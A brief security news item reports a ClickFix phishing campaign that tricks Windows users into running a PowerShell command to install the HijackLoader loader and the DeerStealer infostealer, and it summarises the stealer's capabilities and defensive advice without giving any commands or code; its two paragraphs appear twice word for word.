Malicious actors have exploited the ClickFix attack technique to facilitate the deployment of the HijackLoader and DeerStealer payloads as part of a new campaign, Infosecurity Magazine reports.
Intrusions involved redirection to a phishing page luring targets into executing a PowerShell command on Windows Run that downloads an installer, which leverages a signed COMODO binary, to load HijackLoader and DeerStealer, also known as XFiles Spyware, an analysis from eSentire's Threat Response Unit showed. Aside from enabling data extraction from more than 50 web browsers and takeovers of over 14 types of cryptocurrency wallets, DeerStealer also exfiltrates messenger-, FTP-, VPN-, email-, and gaming client-stored data while ensuring stealth via hidden VNC, modular obfuscation, encrypted HTTPS channels for command-and-control communications, and virtual machine-based string decryption, according to researchers. With DeerStealer poised to include macOS support, expanded targeting, and artificial intelligence-based improvements, organizations have been urged to implement up-to-date endpoint protection and continuous threat monitoring.
Intrusions involved redirection to a phishing page luring targets into executing a PowerShell command on Windows Run that downloads an installer, which leverages a signed COMODO binary, to load HijackLoader and DeerStealer, also known as XFiles Spyware, an analysis from eSentire's Threat Response Unit showed. Aside from enabling data extraction from more than 50 web browsers and takeovers of over 14 types of cryptocurrency wallets, DeerStealer also exfiltrates messenger-, FTP-, VPN-, email-, and gaming client-stored data while ensuring stealth via hidden VNC, modular obfuscation, encrypted HTTPS channels for command-and-control communications, and virtual machine-based string decryption, according to researchers. With DeerStealer poised to include macOS support, expanded targeting, and artificial intelligence-based improvements, organizations have been urged to implement up-to-date endpoint protection and continuous threat monitoring.




